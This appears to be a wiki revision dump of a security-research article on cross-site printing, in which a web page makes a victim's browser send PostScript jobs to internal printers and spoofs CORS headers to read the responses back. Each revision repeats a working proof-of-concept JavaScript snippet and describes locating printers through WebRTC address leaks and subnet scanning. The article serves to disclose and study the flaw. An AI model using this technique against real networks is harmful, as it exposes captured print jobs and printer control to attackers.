192.168.50.202 | PS: 19 Dell 5130cdn & n/a & n/a & 524,280 bit & 62,000 \\ % 192.168.50.24 | PS: 16 | n/a** Dell 1720n & n/a & n/a & 524,280 bit & 12,000 \\ % 192.168.50.44 | PS: 80 Dell 3110cn & n/a & n/a & 524,280 bit & 50,000 \\ % 192.168.50.33 | PS: HMMM | n/a** Kyocera FS-C5200DN & 16 bit & 50 & n/a & n/a \\ % 192.168.50.35 OFF OFF | PS: -- Samsung CLX-3305W & n/a & n/a & 524,280 bit & 62,000 \\ % 192.168.50.87 | PS: HMMM Samsung MultiPress 6345N & n/a & n/a & n/a & n/a \\ % 192.168.50.92 | PS: HMMM Konica bizhub 20p & 16 bit & n/a & 8 bit & 1 \\ % 192.168.50.123 ON UN | PS: BROTHER | n/a* OKI MC342dn & n/a & n/a & 524,280 bit & 38,000 \\ % 192.168.50.127 % \hline % Konica bizhub C454e & 16 bit & 50 & 524,280 bit & ? \\ \hline \end{tabularx} \caption{Exhaustive key search in PJL and PostScript} \label{tab:cracking-results} \end{table} --> 0a117518b3a22b3955f267a222d229b0eae91c23 0 53 619 618 2017-03-24T12:00:20Z Admin 1 wikitext text/x-wiki Cross-site printing (XSP) attacks empower a web attacker to access the printer device as demonstrated by <ref>''[http://helpnetsecurity.com/dl/articles/CrossSitePrinting.pdf Cross Site Printing]'', A. Weaver, 2007</ref> who use a hidden Iframe to send HTTP POST requests to port 9100/tcp of a printer within the victim's internal network. The HTTP header is either printed as plain text or discarded based on the printer's settings. The POST data however can contain arbitrary print jobs like [[PostScript]] or [[PJL]] commands to be interpreted. In the following, the idea of cross-site printing is adapted and improved which enables a web attacker to perform most attacks described in wiki obtaining captured print jobs, using the victim's web browser acts as a carrier. [[File:XSP-deployment-channel.png|420px|Deployment of (potentially malicious) print jobs with XSP]] == Enhanced cross-site printing == Instead of Iframes, we use XMLHttpRequest (XHR) JavaScript objects as defined in <ref>''[https://www.w3.org/TR/XMLHttpRequest/ The XMLHttpRequest Object]'', A. van Kesteren and D. Jackson, W3C, Working Draft, 2007</ref> to perform HTTP POST requests to internal printers. A limitation of the cross-site printing approach discussed so far is that data can only be send to the device, not received because of the same-origin policy <ref>''[https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy The Same Origin Policy]'', J. Ruderman, 2001</ref>. This opts out all information disclosure attacks. To bend the restrictions of the same-origin policy, cross-origin resource sharing (CORS) <ref>''[https://www.w3.org/TR/cors/ Cross-Origin Resource Sharing]'', A. van Kesteren and others, W3C, Working Draft, 2010</ref> can be used – if the web server explicitly allows it by sending a special HTTP header field. In the scenario of cross-site printing, however, we have full control of what the requested ‘web server’ – which actually is a printer [https://en.wikipedia.org/wiki/Raster_image_processor RIP] accessed over port 9100/tcp – sends back to the browser. By using PostScript output commands we can simply emulate an HTTP server running on port 9100/tcp and define our own HTTP header to be responded – including arbitrary CORS <code>Access-Control-Allow-Origin</code> fields which instruct the web browser to allow JavaScript access to this resource and therefore punch a hole into the same-origin policy. A schematic overview of the attack is given below: [[File:Cross-site-printing.png|900px|Advanced cross-site printing with CORS spoofing]] In such an enhanced variant of XSP – combined with CORS spoofing – a web attacker has full access to the HTTP response which allows her to extract arbitrary information like captured print jobs from the printer device. A proof-of-concept JavaScript snipplet is shown below: <syntaxhighlight lang=postscript> job = "\x1B%-12345X\r\n" + "%!\r\n" + "(HTTP/1.0 200 OK\\n) print\r\n" + "(Server: PostScript HTTPD\\n) print\r\n" + "(Access-Control-Allow-Origin: *\\n) print\r\n" + "(Connection: close\\n) print\r\n" + "(Content-Length: ) print\r\n" + "product dup length dup string cvs print\r\n" + "(\\n\\n) print\r\n" + "print\r\n" + "(\\n) print flush\r\n" + "\x1B%-12345X\r\n"; var x = new XMLHttpRequest(); x.open("POST", "http://printer:9100"); x.send(job); x.onreadystatechange = function() { if (x.readyState == 4) alert(x.responseText); }; </syntaxhighlight> == Limitations of cross-site printing == Note that [[PCL]] as page description language is not applicable for CORS spoofing because it only allows one single number to be echoed. [[PJL]] likewise cannot be used because unfortunately it prepends <code>@PJL ECHO</code> to all echoed strings, which makes it impossible to simulate a valid HTTP header. This however does not mean that enhanced XSP attacks are limited to [[PostScript]] jobs: PostScript can be used to respond with a spoofed HTTP header and the [[UEL]] can further be invoked to switch the printer language. This way a web attacker can also obtain the results for PJL commands. Two implementation pitfalls exist which deserve to be mentioned: First, a correct <code>Content-Length</code> for the data to be responded needs determined with PostScript. If the attacker cannot predict the overall size of the response and chunked encoding as well is not an option, she needs to set a very high value and use padding. Second, adding the <code>Connection: close</code> header field is important, otherwise HTTP/1.1 connections are kept alive until either the web client or the printer device triggers a timeout, which means the printer will not be accessible for some time. If the printer device supports plain text printing the HTTP request header of the XHR is printed out as hard copy – including the <code>Origin</code> header field containing the URL that invoked the malicious JavaScript, thus making it hard for an attacker to stay silent. This is unavoidable, as we do not gain control over the printer – and under some circumstances can disable printing functionality – until the HTTP body is processed and the HTTP header has already been interpreted as plain text by the printer device. If reducing noise is a priority, the attacker can however try to first disable printing functionality with proprietary PJL commands as proposed in [[Document processing#PJL_jobmedia|PJL jobmedia]] using other potential XSP channels like IPP, LPD, FTP or the printer's embedded web server. While all protocols could successfully be tested to deploy print jobs using variants of cross-protocol scripting as described by <ref>''[http://www.remote.org/jochen/sec/hfpa/hfpa.pdf The HTML Form Protocol Attack]'', J. Topf, BugTraq posting, 2001</ref> and <ref>''[https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/inter-protocol_exploitation.pdf Inter-Protocol Exploitation]'', W. Alcorn, NGSSoftware Insight Security Research (NISR), 2007</ref> they have some drawbacks beyond not providing feedback using spoofed CORS headers: * Cross-protocol access to LPD and FTP ports is blocked by various web browsers * Parameters for direct printing over the embedded web server are model-specific * The IPP standard requires the <code>Content-type</code> for HTTP POST requests being set to <code>application/ipp</code> <ref>''[https://tools.ietf.org/html/rfc2910 RFC2910 – Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000</ref> which cannot be done with XHR objects – it is however up to the implementation to actually care about incorrect types A comparison of cross-site printing channels is given in below: {| class="wikitable" style="text-align:center" |- ! Channel !! Port !! No Feedback !! Unsolicited printouts !! Standardized !! Blocked by |- | Raw || 9100 || - || ✔ || ✔ || - |- | Web || 80 || ✔ || - || - || - |- | IPP || 631 || ✔ || - || ✔ || - |- | LPD || 515 || ✔ || - || ✔ | style="text-align:left;" | FF, Ch, Op |- | FTP || 21 || ✔ || - || ✔ | style="text-align:left;" | FF, Ch, Op, IE |- |} One major problem of XSP is to find out the correct address or hostname of the printer. Our approach is to abuse WebRTC <ref>''[https://www.w3.org/TR/webrtc/ WebRTC 1.0: Real-time Communication Between Browsers]'', D. Bergkvist and D. Burnett and C. Jennings, W3C, Working Draft, 2014</ref> which is implemented in most modern browsers and has the feature to enumerate IP addresses for local network interfaces. Given the local IP address, XHR objects are further used to open connections to port 9100/tcp for all 253 remaining addresses to retrieve the printer product name using PostScript and CORS spoofing which only takes seconds in our tests. If the printer is on the same subnet as the victim's host its address can be detected solely using JavaScript. WebRTC is in development for Safari and supported by current versions of Firefox, Chrome and Microsoft Edge. Internet Explorer has no WebRTC support, but VBScript and Java can likewise be used to leak the local IP address. If the address of the local interface cannot be retrieved, we apply an intelligent brute-force approach: We try to connect to port 80 of the victim's router using XHR objects. For this, a list of 115 default router addresses from various Internet-accessible resources was compiled. If a router is accessible, we scan the subnet for printers as described before. == Proof-of-concept == A proof-of-concept implementation demonstrating that advanced cross-site printing attacks are practical and a real-world threat to companies and institutions is available at [http://hacking-printers.net/xsp/ hacking-printers.net/xsp/]. It was successfully tested on Firefox 48, Chrome 52, Opera 39 and Internet Explorer 10. It is worth noting that the [https://torproject.org/projects/torbrowser.html.en Tor Browser] blocks the attack because it tries to connect to all addresses – including local ones – through the Tor network meaning XSP requests never reach the intranet printer. <span style="color:red">Update: To prevent cross-site printing, port 9100/tcp may be blocked in future releases of Firefox <ref>''[https://bugzilla.mozilla.org/show_bug.cgi?id=1335688 Bug 1335688 - Cross-Site Printing (XSP) and CORS Spoofing]'', Bugzilla@Mozilla</ref> and Chrome <ref>''[https://bugs.chromium.org/p/chromium/issues/detail?id=687530 Issue 687530 - Security: Cross-Site Printing (XSP) and CORS Spoofing]'', Chromium Bug Tracker</ref>.</span> → ''Related articles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[Port 9100 printing]], [[BeEF]] ---- 5f4b77da17a77585ef66a1bc5363b08c4c0e6ca6 618 617 2017-03-24T11:11:21Z Admin 1 wikitext text/x-wiki Cross-site printing (XSP) attacks empower a web attacker to access the printer device as demonstrated by <ref>''[http://helpnetsecurity.com/dl/articles/CrossSitePrinting.pdf Cross Site Printing]'', A. Weaver, 2007</ref> who use a hidden Iframe to send HTTP POST requests to port 9100/tcp of a printer within the victim's internal network. The HTTP header is either printed as plain text or discarded based on the printer's settings. The POST data however can contain arbitrary print jobs like [[PostScript]] or [[PJL]] commands to be interpreted. In the following, the idea of cross-site printing is adapted and improved which enables a web attacker to perform most attacks described in wiki obtaining captured print jobs, using the victim's web browser acts as a carrier. [[File:XSP-deployment-channel.png|420px|Deployment of (potentially malicious) print jobs with XSP]] == Enhanced cross-site printing == Instead of Iframes, we use XMLHttpRequest (XHR) JavaScript objects as defined in <ref>''[https://www.w3.org/TR/XMLHttpRequest/ The XMLHttpRequest Object]'', A. van Kesteren and D. Jackson, W3C, Working Draft, 2007</ref> to perform HTTP POST requests to internal printers. A limitation of the cross-site printing approach discussed so far is that data can only be send to the device, not received because of the same-origin policy <ref>''[https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy The Same Origin Policy]'', J. Ruderman, 2001</ref>. This opts out all information disclosure attacks. To bend the restrictions of the same-origin policy, cross-origin resource sharing (CORS) <ref>''[https://www.w3.org/TR/cors/ Cross-Origin Resource Sharing]'', A. van Kesteren and others, W3C, Working Draft, 2010</ref> can be used – if the web server explicitly allows it by sending a special HTTP header field. In the scenario of cross-site printing, however, we have full control of what the requested ‘web server’ – which actually is a printer [https://en.wikipedia.org/wiki/Raster_image_processor RIP] accessed over port 9100/tcp – sends back to the browser. By using PostScript output commands we can simply emulate an HTTP server running on port 9100/tcp and define our own HTTP header to be responded – including arbitrary CORS <code>Access-Control-Allow-Origin</code> fields which instruct the web browser to allow JavaScript access to this resource and therefore punch a hole into the same-origin policy. A schematic overview of the attack is given below: [[File:Cross-site-printing.png|900px|Advanced cross-site printing with CORS spoofing]] In such an enhanced variant of XSP – combined with CORS spoofing – a web attacker has full access to the HTTP response which allows her to extract arbitrary information like captured print jobs from the printer device. A proof-of-concept JavaScript snipplet is shown below: <syntaxhighlight lang=postscript> job = "\x1B%-12345X\r\n" + "%!\r\n" + "(HTTP/1.0 200 OK\\n) print\r\n" + "(Server: PostScript HTTPD\\n) print\r\n" + "(Access-Control-Allow-Origin: *\\n) print\r\n" + "(Connection: close\\n) print\r\n" + "(Content-Length: ) print\r\n" + "product dup length dup string cvs print\r\n" + "(\\n\\n) print\r\n" + "print\r\n" + "(\\n) print flush\r\n" + "\x1B%-12345X\r\n"; var x = new XMLHttpRequest(); x.open("POST", "http://printer:9100"); x.send(job); x.onreadystatechange = function() { if (x.readyState == 4) alert(x.responseText); }; </syntaxhighlight> == Limitations of cross-site printing == Note that [[PCL]] as page description language is not applicable for CORS spoofing because it only allows one single number to be echoed. [[PJL]] likewise cannot be used because unfortunately it prepends <code>@PJL ECHO</code> to all echoed strings, which makes it impossible to simulate a valid HTTP header. This however does not mean that enhanced XSP attacks are limited to [[PostScript]] jobs: PostScript can be used to respond with a spoofed HTTP header and the [[UEL]] can further be invoked to switch the printer language. This way a web attacker can also obtain the results for PJL commands. Two implementation pitfalls exist which deserve to be mentioned: First, a correct <code>Content-Length</code> for the data to be responded needs determined with PostScript. If the attacker cannot predict the overall size of the response and chunked encoding as well is not an option, she needs to set a very high value and use padding. Second, adding the <code>Connection: close</code> header field is important, otherwise HTTP/1.1 connections are kept alive until either the web client or the printer device triggers a timeout, which means the printer will not be accessible for some time. If the printer device supports plain text printing the HTTP request header of the XHR is printed out as hard copy – including the <code>Origin</code> header field containing the URL that invoked the malicious JavaScript, thus making it hard for an attacker to stay silent. This is unavoidable, as we do not gain control over the printer – and under some circumstances can disable printing functionality – until the HTTP body is processed and the HTTP header has already been interpreted as plain text by the printer device. If reducing noise is a priority, the attacker can however try to first disable printing functionality with proprietary PJL commands as proposed in [[Document processing#PJL_jobmedia|PJL jobmedia]] using other potential XSP channels like IPP, LPD, FTP or the printer's embedded web server. While all protocols could successfully be tested to deploy print jobs using variants of cross-protocol scripting as described by <ref>''[http://www.remote.org/jochen/sec/hfpa/hfpa.pdf The HTML Form Protocol Attack]'', J. Topf, BugTraq posting, 2001</ref> and <ref>''[https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/inter-protocol_exploitation.pdf Inter-Protocol Exploitation]'', W. Alcorn, NGSSoftware Insight Security Research (NISR), 2007</ref> they have some drawbacks beyond not providing feedback using spoofed CORS headers: * Cross-protocol access to LPD and FTP ports is blocked by various web browsers * Parameters for direct printing over the embedded web server are model-specific * The IPP standard requires the <code>Content-type</code> for HTTP POST requests being set to <code>application/ipp</code> <ref>''[https://tools.ietf.org/html/rfc2910 RFC2910 – Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000</ref> which cannot be done with XHR objects – it is however up to the implementation to actually care about incorrect types A comparison of cross-site printing channels is given in below: {| class="wikitable" style="text-align:center" |- ! Channel !! Port !! No Feedback !! Unsolicited printouts !! Standardized !! Blocked by |- | Raw || 9100 || - || ✔ || ✔ || - |- | Web || 80 || ✔ || - || - || - |- | IPP || 631 || ✔ || - || ✔ || - |- | LPD || 515 || ✔ || - || ✔ | style="text-align:left;" | FF, Ch, Op |- | FTP || 21 || ✔ || - || ✔ | style="text-align:left;" | FF, Ch, Op, IE |- |} One major problem of XSP is to find out the correct address or hostname of the printer. Our approach is to abuse WebRTC <ref>''[https://www.w3.org/TR/webrtc/ WebRTC 1.0: Real-time Communication Between Browsers]'', D. Bergkvist and D. Burnett and C. Jennings, W3C, Working Draft, 2014</ref> which is implemented in most modern browsers and has the feature to enumerate IP addresses for local network interfaces. Given the local IP address, XHR objects are further used to open connections to port 9100/tcp for all 253 remaining addresses to retrieve the printer product name using PostScript and CORS spoofing which only takes seconds in our tests. If the printer is on the same subnet as the victim's host its address can be detected solely using JavaScript. WebRTC is in development for Safari and supported by current versions of Firefox, Chrome and Microsoft Edge. Internet Explorer has no WebRTC support, but VBScript and Java can likewise be used to leak the local IP address. If the address of the local interface cannot be retrieved, we apply an intelligent brute-force approach: We try to connect to port 80 of the victim's router using XHR objects. For this, a list of 115 default router addresses from various Internet-accessible resources was compiled. If a router is accessible, we scan the subnet for printers as described before. == Proof-of-concept == A proof-of-concept implementation demonstrating that advanced cross-site printing attacks are practical and a real-world threat to companies and institutions is available at [http://hacking-printers.net/xsp/ hacking-printers.net/xsp/]. It was successfully tested on Firefox 48, Chrome 52, Opera 39 and Internet Explorer 10. It is worth noting that the [https://torproject.org/projects/torbrowser.html.en Tor Browser] blocks the attack because it tries to connect to all addresses – including local ones – through the Tor network meaning XSP requests never reach the intranet printer. <span style="color:red">Update: To prevent cross-site printing, port 9100/tcp may be blocked in future releases of Firefox <ref>''[https://bugzilla.mozilla.org/show_bug.cgi?id=1335688 Bug 1335688 - Cross-Site Printing (XSP) and CORS Spoofing]'', Bugzilla@Mozilla, 2017</ref> and Chrome <ref>''[https://bugs.chromium.org/p/chromium/issues/detail?id=687530 Issue 687530 - Security: Cross-Site Printing (XSP) and CORS Spoofing]'', Chromium Bug Tracker, 2017</ref>.</span> → ''Related articles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[Port 9100 printing]], [[BeEF]] ---- 5c4f680eafba7e5d06be408c52871d8c4fbd7095 617 616 2017-03-24T11:08:49Z Admin 1 wikitext text/x-wiki Cross-site printing (XSP) attacks empower a web attacker to access the printer device as demonstrated by <ref>''[http://helpnetsecurity.com/dl/articles/CrossSitePrinting.pdf Cross Site Printing]'', A. Weaver, 2007</ref> who use a hidden Iframe to send HTTP POST requests to port 9100/tcp of a printer within the victim's internal network. The HTTP header is either printed as plain text or discarded based on the printer's settings. The POST data however can contain arbitrary print jobs like [[PostScript]] or [[PJL]] commands to be interpreted. In the following, the idea of cross-site printing is adapted and improved which enables a web attacker to perform most attacks described in wiki obtaining captured print jobs, using the victim's web browser acts as a carrier. [[File:XSP-deployment-channel.png|420px|Deployment of (potentially malicious) print jobs with XSP]] == Enhanced cross-site printing == Instead of Iframes, we use XMLHttpRequest (XHR) JavaScript objects as defined in <ref>''[https://www.w3.org/TR/XMLHttpRequest/ The XMLHttpRequest Object]'', A. van Kesteren and D. Jackson, W3C, Working Draft, 2007</ref> to perform HTTP POST requests to internal printers. A limitation of the cross-site printing approach discussed so far is that data can only be send to the device, not received because of the same-origin policy <ref>''[https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy The Same Origin Policy]'', J. Ruderman, 2001</ref>. This opts out all information disclosure attacks. To bend the restrictions of the same-origin policy, cross-origin resource sharing (CORS) <ref>''[https://www.w3.org/TR/cors/ Cross-Origin Resource Sharing]'', A. van Kesteren and others, W3C, Working Draft, 2010</ref> can be used – if the web server explicitly allows it by sending a special HTTP header field. In the scenario of cross-site printing, however, we have full control of what the requested ‘web server’ – which actually is a printer [https://en.wikipedia.org/wiki/Raster_image_processor RIP] accessed over port 9100/tcp – sends back to the browser. By using PostScript output commands we can simply emulate an HTTP server running on port 9100/tcp and define our own HTTP header to be responded – including arbitrary CORS <code>Access-Control-Allow-Origin</code> fields which instruct the web browser to allow JavaScript access to this resource and therefore punch a hole into the same-origin policy. A schematic overview of the attack is given below: [[File:Cross-site-printing.png|900px|Advanced cross-site printing with CORS spoofing]] In such an enhanced variant of XSP – combined with CORS spoofing – a web attacker has full access to the HTTP response which allows her to extract arbitrary information like captured print jobs from the printer device. A proof-of-concept JavaScript snipplet is shown below: <syntaxhighlight lang=postscript> job = "\x1B%-12345X\r\n" + "%!\r\n" + "(HTTP/1.0 200 OK\\n) print\r\n" + "(Server: PostScript HTTPD\\n) print\r\n" + "(Access-Control-Allow-Origin: *\\n) print\r\n" + "(Connection: close\\n) print\r\n" + "(Content-Length: ) print\r\n" + "product dup length dup string cvs print\r\n" + "(\\n\\n) print\r\n" + "print\r\n" + "(\\n) print flush\r\n" + "\x1B%-12345X\r\n"; var x = new XMLHttpRequest(); x.open("POST", "http://printer:9100"); x.send(job); x.onreadystatechange = function() { if (x.readyState == 4) alert(x.responseText); }; </syntaxhighlight> == Limitations of cross-site printing == Note that [[PCL]] as page description language is not applicable for CORS spoofing because it only allows one single number to be echoed. [[PJL]] likewise cannot be used because unfortunately it prepends <code>@PJL ECHO</code> to all echoed strings, which makes it impossible to simulate a valid HTTP header. This however does not mean that enhanced XSP attacks are limited to [[PostScript]] jobs: PostScript can be used to respond with a spoofed HTTP header and the [[UEL]] can further be invoked to switch the printer language. This way a web attacker can also obtain the results for PJL commands. Two implementation pitfalls exist which deserve to be mentioned: First, a correct <code>Content-Length</code> for the data to be responded needs determined with PostScript. If the attacker cannot predict the overall size of the response and chunked encoding as well is not an option, she needs to set a very high value and use padding. Second, adding the <code>Connection: close</code> header field is important, otherwise HTTP/1.1 connections are kept alive until either the web client or the printer device triggers a timeout, which means the printer will not be accessible for some time. If the printer device supports plain text printing the HTTP request header of the XHR is printed out as hard copy – including the <code>Origin</code> header field containing the URL that invoked the malicious JavaScript, thus making it hard for an attacker to stay silent. This is unavoidable, as we do not gain control over the printer – and under some circumstances can disable printing functionality – until the HTTP body is processed and the HTTP header has already been interpreted as plain text by the printer device. If reducing noise is a priority, the attacker can however try to first disable printing functionality with proprietary PJL commands as proposed in [[Document processing#PJL_jobmedia|PJL jobmedia]] using other potential XSP channels like IPP, LPD, FTP or the printer's embedded web server. While all protocols could successfully be tested to deploy print jobs using variants of cross-protocol scripting as described by <ref>''[http://www.remote.org/jochen/sec/hfpa/hfpa.pdf The HTML Form Protocol Attack]'', J. Topf, BugTraq posting, 2001</ref> and <ref>''[https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/inter-protocol_exploitation.pdf Inter-Protocol Exploitation]'', W. Alcorn, NGSSoftware Insight Security Research (NISR), 2007</ref> they have some drawbacks beyond not providing feedback using spoofed CORS headers: * Cross-protocol access to LPD and FTP ports is blocked by various web browsers * Parameters for direct printing over the embedded web server are model-specific * The IPP standard requires the <code>Content-type</code> for HTTP POST requests being set to <code>application/ipp</code> <ref>''[https://tools.ietf.org/html/rfc2910 RFC2910 – Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000</ref> which cannot be done with XHR objects – it is however up to the implementation to actually care about incorrect types A comparison of cross-site printing channels is given in below: {| class="wikitable" style="text-align:center" |- ! Channel !! Port !! No Feedback !! Unsolicited printouts !! Standardized !! Blocked by |- | Raw || 9100 || - || ✔ || ✔ || - |- | Web || 80 || ✔ || - || - || - |- | IPP || 631 || ✔ || - || ✔ || - |- | LPD || 515 || ✔ || - || ✔ | style="text-align:left;" | FF, Ch, Op |- | FTP || 21 || ✔ || - || ✔ | style="text-align:left;" | FF, Ch, Op, IE |- |} One major problem of XSP is to find out the correct address or hostname of the printer. Our approach is to abuse WebRTC <ref>''[https://www.w3.org/TR/webrtc/ WebRTC 1.0: Real-time Communication Between Browsers]'', D. Bergkvist and D. Burnett and C. Jennings, W3C, Working Draft, 2014</ref> which is implemented in most modern browsers and has the feature to enumerate IP addresses for local network interfaces. Given the local IP address, XHR objects are further used to open connections to port 9100/tcp for all 253 remaining addresses to retrieve the printer product name using PostScript and CORS spoofing which only takes seconds in our tests. If the printer is on the same subnet as the victim's host its address can be detected solely using JavaScript. WebRTC is in development for Safari and supported by current versions of Firefox, Chrome and Microsoft Edge. Internet Explorer has no WebRTC support, but VBScript and Java can likewise be used to leak the local IP address. If the address of the local interface cannot be retrieved, we apply an intelligent brute-force approach: We try to connect to port 80 of the victim's router using XHR objects. For this, a list of 115 default router addresses from various Internet-accessible resources was compiled. If a router is accessible, we scan the subnet for printers as described before. == Proof-of-concept == A proof-of-concept implementation demonstrating that advanced cross-site printing attacks are practical and a real-world threat to companies and institutions is available at [http://hacking-printers.net/xsp/ hacking-printers.net/xsp/]. It was successfully tested on Firefox 48, Chrome 52, Opera 39 and Internet Explorer 10. It is worth noting that the [https://torproject.org/projects/torbrowser.html.en Tor Browser] blocks the attack because it tries to connect to all addresses – including local ones – through the Tor network meaning XSP requests never reach the intranet printer. <span style="color:red">Update: To prevent cross-site printing, port 9100/tcp may be blocked in future releases of Firefox <ref>''[https://bugzilla.mozilla.org/show_bug.cgi?id=1335688 Bug 1335688 - Cross-Site Printing (XSP) and CORS Bugzilla@Mozilla, 2017</ref> and Chrome <ref>''[https://bugs.chromium.org/p/chromium/issues/detail?id=687530 Issue 687530 - Security: Cross-Site Printing (XSP) and CORS Spoofing]'', Chromium Bug Tracker, 2017</ref>.</span> → ''Related articles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[Port 9100 printing]], [[BeEF]] ---- 342fb1c12a57ca715d0b5f19f1fd65157726f4c1 616 611 2017-03-24T11:08:28Z Admin 1 /* Proof-of-concept */ wikitext text/x-wiki Cross-site printing (XSP) attacks empower a web attacker to access the printer device as demonstrated by <ref>''[http://helpnetsecurity.com/dl/articles/CrossSitePrinting.pdf Cross Site Printing]'', A. Weaver, 2007</ref> who use a hidden Iframe to send HTTP POST requests to port 9100/tcp of a printer within the victim's internal network. The HTTP header is either printed as plain text or discarded based on the printer's settings. The POST data however can contain arbitrary print jobs like [[PostScript]] or [[PJL]] commands to be interpreted. In the following, the idea of cross-site printing is adapted and improved which enables a web attacker to perform most attacks described in wiki obtaining captured print jobs, using the victim's web browser acts as a carrier. [[File:XSP-deployment-channel.png|420px|Deployment of (potentially malicious) print jobs with XSP]] == Enhanced cross-site printing == Instead of Iframes, we use XMLHttpRequest (XHR) JavaScript objects as defined in <ref>''[https://www.w3.org/TR/XMLHttpRequest/ The XMLHttpRequest Object]'', A. van Kesteren and D. Jackson, W3C, Working Draft, 2007</ref> to perform HTTP POST requests to internal printers. A limitation of the cross-site printing approach discussed so far is that data can only be send to the device, not received because of the same-origin policy <ref>''[https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy The Same Origin Policy]'', J. Ruderman, 2001</ref>. This opts out all information disclosure attacks. To bend the restrictions of the same-origin policy, cross-origin resource sharing (CORS) <ref>''[https://www.w3.org/TR/cors/ Cross-Origin Resource Sharing]'', A. van Kesteren and others, W3C, Working Draft, 2010</ref> can be used – if the web server explicitly allows it by sending a special HTTP header field. In the scenario of cross-site printing, however, we have full control of what the requested ‘web server’ – which actually is a printer [https://en.wikipedia.org/wiki/Raster_image_processor RIP] accessed over port 9100/tcp – sends back to the browser. By using PostScript output commands we can simply emulate an HTTP server running on port 9100/tcp and define our own HTTP header to be responded – including arbitrary CORS <code>Access-Control-Allow-Origin</code> fields which instruct the web browser to allow JavaScript access to this resource and therefore punch a hole into the same-origin policy. A schematic overview of the attack is given below: [[File:Cross-site-printing.png|900px|Advanced cross-site printing with CORS spoofing]] In such an enhanced variant of XSP – combined with CORS spoofing – a web attacker has full access to the HTTP response which allows her to extract arbitrary information like captured print jobs from the printer device. A proof-of-concept JavaScript snipplet is shown below: <syntaxhighlight lang=postscript> job = "\x1B%-12345X\r\n" + "%!\r\n" + "(HTTP/1.0 200 OK\\n) print\r\n" + "(Server: PostScript HTTPD\\n) print\r\n" + "(Access-Control-Allow-Origin: *\\n) print\r\n" + "(Connection: close\\n) print\r\n" + "(Content-Length: ) print\r\n" + "product dup length dup string cvs print\r\n" + "(\\n\\n) print\r\n" + "print\r\n" + "(\\n) print flush\r\n" + "\x1B%-12345X\r\n"; var x = new XMLHttpRequest(); x.open("POST", "http://printer:9100"); x.send(job); x.onreadystatechange = function() { if (x.readyState == 4) alert(x.responseText); }; </syntaxhighlight> == Limitations of cross-site printing == Note that [[PCL]] as page description language is not applicable for CORS spoofing because it only allows one single number to be echoed. [[PJL]] likewise cannot be used because unfortunately it prepends <code>@PJL ECHO</code> to all echoed strings, which makes it impossible to simulate a valid HTTP header. This however does not mean that enhanced XSP attacks are limited to [[PostScript]] jobs: PostScript can be used to respond with a spoofed HTTP header and the [[UEL]] can further be invoked to switch the printer language. This way a web attacker can also obtain the results for PJL commands. Two implementation pitfalls exist which deserve to be mentioned: First, a correct <code>Content-Length</code> for the data to be responded needs determined with PostScript. If the attacker cannot predict the overall size of the response and chunked encoding as well is not an option, she needs to set a very high value and use padding. Second, adding the <code>Connection: close</code> header field is important, otherwise HTTP/1.1 connections are kept alive until either the web client or the printer device triggers a timeout, which means the printer will not be accessible for some time. If the printer device supports plain text printing the HTTP request header of the XHR is printed out as hard copy – including the <code>Origin</code> header field containing the URL that invoked the malicious JavaScript, thus making it hard for an attacker to stay silent. This is unavoidable, as we do not gain control over the printer – and under some circumstances can disable printing functionality – until the HTTP body is processed and the HTTP header has already been interpreted as plain text by the printer device. If reducing noise is a priority, the attacker can however try to first disable printing functionality with proprietary PJL commands as proposed in [[Document processing#PJL_jobmedia|PJL jobmedia]] using other potential XSP channels like IPP, LPD, FTP or the printer's embedded web server. While all protocols could successfully be tested to deploy print jobs using variants of cross-protocol scripting as described by <ref>''[http://www.remote.org/jochen/sec/hfpa/hfpa.pdf The HTML Form Protocol Attack]'', J. Topf, BugTraq posting, 2001</ref> and <ref>''[https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/inter-protocol_exploitation.pdf Inter-Protocol Exploitation]'', W. Alcorn, NGSSoftware Insight Security Research (NISR), 2007</ref> they have some drawbacks beyond not providing feedback using spoofed CORS headers: * Cross-protocol access to LPD and FTP ports is blocked by various web browsers * Parameters for direct printing over the embedded web server are model-specific * The IPP standard requires the <code>Content-type</code> for HTTP POST requests being set to <code>application/ipp</code> <ref>''[https://tools.ietf.org/html/rfc2910 RFC2910 – Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000</ref> which cannot be done with XHR objects – it is however up to the implementation to actually care about incorrect types A comparison of cross-site printing channels is given in below: {| class="wikitable" style="text-align:center" |- ! Channel !! Port !! No Feedback !! Unsolicited printouts !! Standardized !! Blocked by |- | Raw || 9100 || - || ✔ || ✔ || - |- | Web || 80 || ✔ || - || - || - |- | IPP || 631 || ✔ || - || ✔ || - |- | LPD || 515 || ✔ || - || ✔ | style="text-align:left;" | FF, Ch, Op |- | FTP || 21 || ✔ || - || ✔ | style="text-align:left;" | FF, Ch, Op, IE |- |} One major problem of XSP is to find out the correct address or hostname of the printer. Our approach is to abuse WebRTC <ref>''[https://www.w3.org/TR/webrtc/ WebRTC 1.0: Real-time Communication Between Browsers]'', D. Bergkvist and D. Burnett and C. Jennings, W3C, Working Draft, 2014</ref> which is implemented in most modern browsers and has the feature to enumerate IP addresses for local network interfaces. Given the local IP address, XHR objects are further used to open connections to port 9100/tcp for all 253 remaining addresses to retrieve the printer product name using PostScript and CORS spoofing which only takes seconds in our tests. If the printer is on the same subnet as the victim's host its address can be detected solely using JavaScript. WebRTC is in development for Safari and supported by current versions of Firefox, Chrome and Microsoft Edge. Internet Explorer has no WebRTC support, but VBScript and Java can likewise be used to leak the local IP address. If the address of the local interface cannot be retrieved, we apply an intelligent brute-force approach: We try to connect to port 80 of the victim's router using XHR objects. For this, a list of 115 default router addresses from various Internet-accessible resources was compiled. If a router is accessible, we scan the subnet for printers as described before. == Proof-of-concept == A proof-of-concept implementation demonstrating that advanced cross-site printing attacks are practical and a real-world threat to companies and institutions is available at 